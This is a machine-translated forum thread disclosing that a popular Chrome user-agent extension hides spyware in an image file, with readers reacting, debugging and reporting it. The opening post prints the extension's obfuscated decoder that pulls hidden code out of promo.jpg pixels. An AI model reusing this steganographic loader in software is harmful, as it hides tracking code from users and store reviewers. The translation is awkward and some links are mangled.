V2EX
The browser
Notice that Chrome’s User-Agent Switcher is a Trojan horse
Chrome Store search user-Agent Switcher, top of this plugin (450,000 users), is a Trojan horse…
Chrome.google.com/webstore/de…
To get around Chrome’s moderation policies, he hid the malicious code in promo.jpg
Line 80 of background.js decrypts the malicious code from the image and executes it
t.prototype.Vh = function(t, e) { if ("" === '.. /promo.jpg') return ""; void 0 === t && (t = '.. /promo.jpg'), t.length && (t = r.Wk(t)), e = e || {}; var n = this.ET, i = e.mp || n.mp, o = e.Tv || n.Tv, h = e.At || n.At, a = r.Yb(Math.pow(2, i)), f = (e.WC || n.WC, e.TY || n.TY), u = document.createElement("canvas"), p = u.getContext("2d"); if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return ""; e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0); var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return ""; var m, s; if (1 === o) for (m = 3, s = ! 1; ! s && m < d.length && ! s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1)); var v = "", w = 0, y = 0, l = Math.pow(2, h) - 1; for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y); return v.length < 13 ? "" : (0. == w && (v += String.fromCharCode(w & l)), v) }Copy the codeIt encrypts the URL of every TAB you open and sends it toUaswitcher.org/logic/page/…
In addition, it will be fromAPI. Data – monitor. The info/API/bhrule?…Get promotion link rules, open the rules of the website, will insert ads or even malicious code in the page.
Threatbook (www.threatBook)X.t hreatbook. Cn/domain/API….), I guess the following plug-ins are the work of this author..
Chrome.google.com/webstore/de…
Chrome.google.com/webstore/de…
Chrome.google.com/webstore/de…
Chrome.google.com/webstore/de…
There are also discussing this question someone news.ycombinator.com/item?id=148…
|
| 1 2 |
|
 |
gzlockVia Android ♥ 2 really change agent, get up quickly delete |
 |
kmahyygOh, my God, let me go back and check |
 |
sunbeams001Two days ago it was horrible |
 |
AntidictatorVia Android I wipe.. |
 |
t123yhVia Android is freaking scary |
 |
torbrowserbridgeVia Android I wiped 2 days ago, probably already financial freedom |
 |
whwq2012Thankfully, I’ve long since stopped using the UA toggle tool |
 |
ahhuiOh my God, get up and delete it |
 |
houbaronVia Android I’m using right now… What are the alternatives? |
|
torbrowserbridgeHow did you find that out, cool |
 |
wave3cTwo days ago used to scare for years |
 |
mylanchVia iPhone 2 days ago What will Google officially do |
 |
liyiecho♥ 4 I am using Google user-Agent Switcher for Chrome @houbaron# 9Chrome.google.com/webstore/de… |
 |
dong3580Via Android I deleted this one once and replaced it with another one. I am afraid that I can delete it all. What about firefox with the same name? @liyiechoThis is actually official, fortunately 😂 did not hit, |
 |
Cambrian07♥ 2 days agoliyiechoAfter deleting it, I found that mine was also provided by Google, and silently installed it again… |
 |
crystom2 days ago, I fell for it. Fortunately, I only enabled this extension when USING it |
 |
anoymoux@ 2 days agodong3580Firefox isn’t secure either, most of the add-ons this guy wrote are available for Firefox, Opera, and the few I’ve listed have over a million users on Chrome alone |
|
anoymouxAlas, I’ve had this plugin installed for years and it’s disgusting to think it was monitored by this Russian hacker… |
 |
qlbr2 days agoChrome.google.com/webstore/de… Excuse me is this, no ladder good anxious |
 |
honkVia Android add dev Tools by yourself |
 |
akwIX@ 2 days agoqlbr# 19 is |
|
akwIXI was using this two days ago Chrome.google.com/webstore/de… |
 |
crisfunVia iPhone check it out tonight |
 |
doubleflower2 days ago try not to install mods written by Russians… |
 |
infun@ 2 days agoCambrian07orz + 1 |
 |
lpy6759Can deleting the code 2 days ago solve the Trojan horse |
 |
lantianqirenNice guy |
 |
deeporistI was surprised 2 days ago. Luckily, I used smart Header for Chrome, but I still have one in Firefox. It looks like the author is a jerk and I deleted it immediately However, I have almost never used the ff, but changed the UA to umatrix directly |
 |
fzhw88Via Android @ 2 days agoliyiechoThat’s what I use, too |
 |
qa2080639Deleted it 2 days ago… |
 |
zro2 days ago, fortunately, none of these Chrome add-ons were installed @deeporist#28 FF I used this oneAddons.mozilla.org/en-US/firef…  |
 |
zhuziyiOh my God, uninstall first to respect, please come and check it further. |
|
dong3580@ 2 days agozro I have this on Firefox, I don’t know if it’s a problem, |
 |
paradoxsBrowser extensions don’t have too many permissions, they automatically update, and they don’t open anything except the super important extensions. |
 |
ihciahVia iPhone a lot of plugins have been bought and inserted back door code. Previously in a seemingly called Web timer found always jump rebate link, check the source surprised. |
 |
shiloh77What was the author’s name on Firefox 2 days ago? A little scared to install himself into his plugin… Thank lz |
 |
ynyounuoUnfortunately, I’m afraid many people have been poisoned for a year and a half./t/263719 |
 |
jfdnetRemember that there was a special article about this before there were several famous mods that were sold and then reinvented |
 |
xujinkaiTwo days ago I was so scared that I disabled all the plugins I don’t use |
 |
lechainSwitchyOmega has been used 2 days ago, will it be ok? |
 |
zuolanHorrible 2 days ago thanks for the exposure. |
 |
hjdtlChrome was contacted 2 days ago |
 |
salary123Via Android this long before anyone found out. Thankfully, it’s not on a popular browser |
 |
saranVia Android has no cameo appearance with the baby (jun °3° Jun) |
 |
ghost444@ 1 day beforeanoymouxAMO extensions are manually reviewed and certainly better than the Chrome Web Store… |
 |
iyangfeiI didn’t use this a day ago |
 |
UnisandK1 day ago Oh my God |
 |
EchoChan@ 1 day beforeqlbrThat’s what I’m talking about. |
 |
ClooodyIf it was true 1 day ago, go to Google store there to report it well, lest later people suffer. |
 |
showgood163Via Android thanks for the reminder. These extensions are not currently in use. ? |
|
doubleflower1 day ago there were thousands of NPM packages on the computer. If one of them wanted to do something bad or the NPM account was stolen… That does more damage than a plugin. |
 |
7654I use Firefox and host the User Agent Overrider extension on Github |
 |
mjarNot a day ago, but I’d like to see what that picture looks like… |
|
mjarOne day before! [promo.jpg]( ) |
 |
usednameI wiped it a day ago. I used thisChrome.google.com/webstore/de… The name was only slightly off |
 |
Izual_YangVia Android @ 1 day agodeeporistWhen I installed Umatrix, I confused UA, and then I went up and down zhihu |
 |
hvanke@ 1 day beforedong3580 This is what the landlord gaveChrome.google.com/webstore/de… I think that’s the official oneChrome.google.com/webstore/de… Not the same one, right? |
 |
hantsyI am using Proxy SwitchOmega |
|
ynyounuo@ 1 day beforehantsyIt’s not the same thing |
 |
popok@ 1 day beforedeeporist#28 Ha ha, I use smart Header too |
 |
redsonicCan LZ post js directly in the picture 1 day ago |
 |
lslqtz1 day ago Oh my God. I was in use |
 |
MaxMadcc1 day ago I also want to know after decrypting the image, what was done |
|
lslqtzOne day before the background. Js Line 80, I think I can get rid of that |
 |
jeffson1 day ago terrible |
|
lslqtzChanged those places a day ago and submitted a links-only one for myself |
 |
U2FsdGVkX1Have been use djflhoibgkdhkhhcedjiklpkjnoahfmg 1 day before Provided by Google |
 |
xifangczyA day ago shit. That’s what I use… But because he will add a lot of menus in the right button can not be closed, usually are prohibited. |
 |
Tony2eeI saw this a day ago Chrome.google.com/webstore/de… Uninstall malware and complain about malware… Feeling guilty… |
 |
asdwdddThis was the one that worked a day ago User-Agent Switcher for Chrome offered by google.com Black hackers are… |
 |
jliangchan1 day ago in chrome store reported malicious software, extensions rogue really not easy to find, operators/DNS/plug-ins may hijack the rebate link, it is difficult to rule out the discovery of who is the problem. |
 |
fhefhJust over 60 people read their own book one day ago |
 |
exoticknight1 day ago Thank you, uninstalled |
 |
liaoyaohengReport it a day ago and do your part. |
 |
schemaThanks for sharing ~ |
 |
1720551 day ago last year… |
 |
yukiww233I was scared to death a day ago when I found out I was using the Google one. Report it |
 |
skadiVia Android has never been used… |
|
hantsy@ 1 day beforeynyounuoSorry, I didn’t get a good look. |
 |
drwxI used a Header Hacker plugin a day ago, and it has the same author as Google’s official plugin, but it doesn’t have a list of UA’s built in, so I need to add it myself, but it looks a little easier on the interface. . |
 |
tbag781623489Via iPhone thank you, no wonder you often pop up some gweilo promotion. I’ll have to write it myself |
|
MaxMadcc@ 1 day beforeanoymouxDoes this plugin only upload TAB URL information? |
 |
achendian2Horrible deleted 1 day ago |
 |
LuoboTixS1 days ago Chrome store ranking head free hot plug-in, if perennial update, the function has been mature and shaped, should consider whether there is a stolen data or even change the page content (advertising jump) back door risk, or Dev drink wind ah? English Internet also has a lot of pseudo tool software (advertising Trojan) by universal keywords SEO lure click download can put the browser plug seven bleeding, but do not report poison is difficult to locate |
 |
kappaOne day before useChrome.google.com/webstore/de… offered by google.com |
 |
xcc8801 days ago 0.0 was installed for a long time |
 |
acessWhy did this look familiar to me 1 day ago: Chrome extensions are being sold to be added to malicious code www.solidot.org/story?mode=… |
 |
KingfreeHow come this guy had a problem a day ago and didn’t get reported? |
 |
xspocoI faked it a day ago. Just delete it. |
|
redsonicDid a little digging a day ago, didn’t find any data leaked to that domain. T.prototype. Vh This call has no arguments, resulting in if (u.style.display = “none”, u.width || t.width, u.height || t.height, 0 === u.width || 0 === u.height) return “”; Return directly, and there is no way of knowing where the hack code is hidden in the image Even if this sentence is commented out, the canvas has no drawing, so there are all zeros in d var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return “”; Finally also return, can not reach the back of the decoding. LZ should share how he knew what was in there. I’m not speaking for the plugin, just want to know the actual damage, load an image and then run a large chunk of confusing code is not good. |
 |
15015613♥ 1 day agozro @shiloh77 User Agent Switcher (Addons.mozilla.org/en-US/firef… This is open source. The source code is hereGithub.com/chrispederi… |
 |
lingaoyiVia iPhone so scary…. |
 |
Haiwx@ 1 day before15015613Last updated January 4, 2011, Manual Stall |
 |
cyg07@ 1 day beforeredsonic360 has uploaded information in its analysis report Mp.weixin.qq.com/s?__biz=MzU… |
 |
xi_linI won the lottery a day ago |
|
redsonic@ 1 day beforecyg07 Cert. 360. Cn/warning/det… There was no hash, no signature, no mention of what was hidden in the image or where. I actually verified the plug-in, and line 80 did load promo.jpg, but it was immediately returned. It may actually be much less harmful. |
|
anoymoux♥ 21 hours, 16 minutes ago 1 @redsonicAfter all that effort to hide the code in the image, how can you just execute it and return it… If you extract that line and debug trace it, you can see that the following two pieces of code are decrypted pastebin.com/ZYd82Hkm pastebin.com/gXV094wm Despite the confusion, it’s still easy to see the Trojan’s behavior… The author is still very cunning, the monitoring module will not trigger after the installation,24 hours later. In addition, chrome’s F12 Network does not see requests sent by plug-ins, which is why many malicious plug-ins can exist for so long… To see a request sent by a plugin, go to chrome:// Extensions/Plugins -> Background and select Network |
|
redsonic20 hours 26 minutes ago @anoymoux d=c.data,g=[]; Console. log(d) is printed with all zeros, but it will return, so it should be decrypted when the picture is displayed. I have caught the package for two days, but I did not catch the url request. You just open a TAB and you get it? |
|
redsonic18 hours 40 minutes ago @anoymouxThanks, you can debug the code directly in the Extensions, but the first getImageData will be all 0, and the second time will be ok. I’m going to pull that out and it’s going to be return no matter how you debug it. However, the obfuscation code solved did not issue anything, in the inside of the loop for a period of exit, should still need some conditions. |
|
redsonicWhat was this part 18 hours and 22 minutes agopastebin.com/gXV094wm The code I solved for is this part right herepastebin.com/ZYd82Hkm @anoymoux |
| 1 2 |
|